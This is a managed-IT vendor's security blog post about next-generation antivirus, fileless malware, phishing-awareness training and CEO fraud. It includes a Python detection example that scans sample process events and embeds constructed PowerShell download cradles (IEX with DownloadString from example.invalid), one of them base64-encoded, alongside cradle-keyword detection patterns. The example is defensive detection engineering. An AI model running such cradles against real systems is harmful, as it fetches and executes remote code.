By Dave Parsons, Chief Information Security Officer at Abacus Group
Abacus Group recently deployed next-generation antivirus (NGAV) software across the full client and staff workstation fleet attached to our private cloud platform. Rather than scanning files for known signatures, the NGAV software monitors the processes spawned by the operating system and decides from their behaviour whether each one is malicious.
Risk of Social Engineering
Fileless malware accounts for more than 50% of all current workstation attacks. A fileless attack does not depend on writing malicious code to the victim's disk. Instead, it subverts legitimate tools that are already present in the browser or operating system, such as scripting engines and administrative utilities, and turns them against the user. This makes the attack relatively stealthy and difficult for legacy, file-scanning antivirus to detect. Basic system hygiene, such as patching and a least-privilege policy, is important; more important still is making sure staff understand the risks at hand, because most fileless malware is delivered by social engineering: phishing and spear-phishing, malvertising, watering-hole sites and similar attacks.
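The two ideas above, an NGAV judging a process by what it does rather than by what is on disk, and a fileless attack living off built-in tools, are easier to see in code. The following is an added example written for this page; it is not Abacus Group's product, KnowBe4's, or code from the original article. It runs a handful of constructed process-creation events, shaped like Sysmon event ID 1 / EDR process telemetry, through three process-lineage rules a detection engineer would typically start with: an Office application spawning a script host, an encoded PowerShell command line, and download-cradle keywords (checked on the decoded script when the command is encoded). Every process name, path, user name and the example.invalid URL is invented for illustration.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name
    cmdline: str    # full command line as recorded at process creation


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Tokens typical of PowerShell download cradles and in-memory execution.
CRADLE = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|net\.webclient"
    r"|invoke-webrequest|\biwr\b|frombase64string",
    re.IGNORECASE,
)
# -EncodedCommand and the abbreviations PowerShell accepts, then the base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext script behind a -EncodedCommand argument, or None.

    PowerShell expects base64 of the UTF-16LE script, so decode it that way;
    anything that does not decode cleanly is treated as not encoded.
    """
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_suspicious(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Evaluate three process-lineage rules; return (pid, reasons) per hit."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        image = e.image.lower()
        parent = by_pid.get(e.ppid)
        decoded = decode_encoded_command(e.cmdline)
        effective_cmdline = decoded if decoded is not None else e.cmdline
        reasons = []
        # Rule 1: an Office document has no business launching a script host.
        if parent is not None and parent.image.lower() in OFFICE_APPS \
                and image in SCRIPT_HOSTS:
            reasons.append(f"{parent.image.lower()} spawned {image}")
        # Rule 2: encoding hides the script from plain command-line logging.
        if image in POWERSHELL and decoded is not None:
            reasons.append("encoded PowerShell command")
        # Rule 3: cradle keywords, matched on the decoded text when encoded.
        if image in POWERSHELL and CRADLE.search(effective_cmdline):
            reasons.append("download cradle / in-memory execution")
        if reasons:
            findings.append((e.pid, reasons))
    return findings


# Constructed stage-2 script; example.invalid is a reserved, non-resolving name.
STAGE2_SCRIPT = ("IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.invalid/s2.ps1')")
STAGE2_ENCODED = base64.b64encode(STAGE2_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed telemetry for one phishing-driven fileless chain plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    # User opens a macro-enabled attachment from a phishing email.
    ProcEvent(200, 100, "WINWORD.EXE",
              '"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
              '/n "C:\\Users\\alice\\Downloads\\Invoice_4471.docm"'),
    # The macro launches hidden, encoded PowerShell: nothing touches disk.
    ProcEvent(300, 200, "powershell.exe",
              f"powershell.exe -NoP -NonI -W Hidden -Enc {STAGE2_ENCODED}"),
    # Benign: an admin script run from the desktop shell.
    ProcEvent(400, 100, "powershell.exe",
              "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1"),
    # WMI-launched cradle with no encoding: caught by the keyword rule alone.
    ProcEvent(50, 4, "WmiPrvSE.exe", "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"),
    ProcEvent(600, 50, "powershell.exe",
              "powershell.exe -Command \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/beacon.ps1')\""),
]

if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {pid}: {'; '.join(reasons)}")
```

Run stand-alone it flags pid 300 on all three rules and pid 600 on the cradle rule only, while the administrator's backup script (pid 400) passes. The point for a fileless attack is that none of the three rules look at a file: parentage and command-line content are the evidence, which is why the user who opened the attachment, not the antivirus, is usually the earliest point at which the chain could have been stopped.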
Abacus Group provides a multi-layered, defense-in-depth cybersecurity strategy built on people, process and technology. The user community is the first line of defense in every organization, and consistent staff education is a cornerstone of every healthy IT security program. Our AbacusFLEX™ IT-as-a-Service solution includes an annual cybersecurity awareness education program designed to give employees cybersecurity training, an understanding of common social engineering threats, and the steps required to avoid exploitation.
Abacus Group has seen a vast improvement in the identification and reporting of phishing attempts since the implementation of a web-based training program in 2017. Our cybersecurity education program, provided by our training partner KnowBe4, inspires our clients to perform exceptionally well compared to industry benchmark data:
AbacusFLEX Client phish-prone % = 0.35%
Industry phish-prone % = 13.10%*
* Based on 6 million worldwide users of KnowBe4 training videos and phish testing.
Phishing: a scam by which an Internet user is duped (as by a deceptive e-mail message) into revealing personal or confidential information which the scammer can use illicitly (source: www.merriam-webster.com)
According to KnowBe4’s 2018 Threat Impact and Endpoint Protection Report, “organizations continually performing security awareness training, as well as periodically testing employees with phishing emails saw the lowest percentage of ransomware attacks (8%) and malware-based external attacks (14%) in the last 12 months.”
AbacusFLEX Cybersecurity Awareness Education Program
This is why we offer our clients a multi-phase cybersecurity awareness education program, which includes the following components:
- Cybersecurity Training: An on-demand interactive and self-paced training video is sent to all users and taken at their convenience over a designated two-week period. The 15-minute video includes common traps, demos and scenario-based exercises.
- Phishing Test: A simulated phishing email is sent to each user at a random time within a two-week period. The test is fully automated, uses tactics commonly seen in real attacks, and directs users who click through to an educational landing page.
- Compliance Reporting: Training and testing metrics for each client reside within their Abacus Client Portal, giving compliance officers current and historic reporting on users' progress and completion shortly after the training period ends.
One of the most common social engineering scams we see today is CEO Fraud (also known as business email compromise, or BEC).
“CEO Fraud is a scam in which cybercriminals spoof company email accounts and impersonate executives to try and fool an employee in accounting or HR into executing unauthorized wire transfers, or sending out confidential tax information. In the time period from January 2015 to June 2016, the FBI reported a 1300% rise in losses from this type of fraud. Most victims are in the US (all 50 states), but companies in 100 other countries have also reported incidents. While the fraudulent transfers have been sent to 79 countries, most end up in China and Hong Kong. Unless the fraud is spotted within 24 hours, the chances of recovery are small.” (source: KnowBe4)
KnowBe4 has outlined 5 common attack scenarios for CEO Fraud:
- Business working with a foreign supplier: This scam takes advantage of a long-standing wire-transfer relationship with a supplier, but asks for the funds to be sent to a different account.
- Business receiving or initiating a wire transfer request: The attacker compromises or spoofs the email account of a top executive. Another employee then receives a message instructing them to transfer funds, or a financial institution receives a request from the company to send funds to another account. The requests appear genuine because they arrive from, or appear to arrive from, the correct email address.
- Business contacts receiving fraudulent correspondence: The attacker takes over an employee's email account and sends invoices to the company's suppliers, so that payments are made to bogus accounts.
- Executive and attorney impersonation: The fraudsters pretend to be lawyers or executives dealing with confidential and time-sensitive matters.
- Data theft: Fraudulent emails request either all wage or tax statement (W-2) forms or a company list of personally identifiable information (PII). These come from compromised and/or spoofed executive email accounts and are sent to the HR department, accounts or auditing departments.
Make sure YOUR firm is protected from social engineering by mandating staff completion of annual cybersecurity training and phish testing.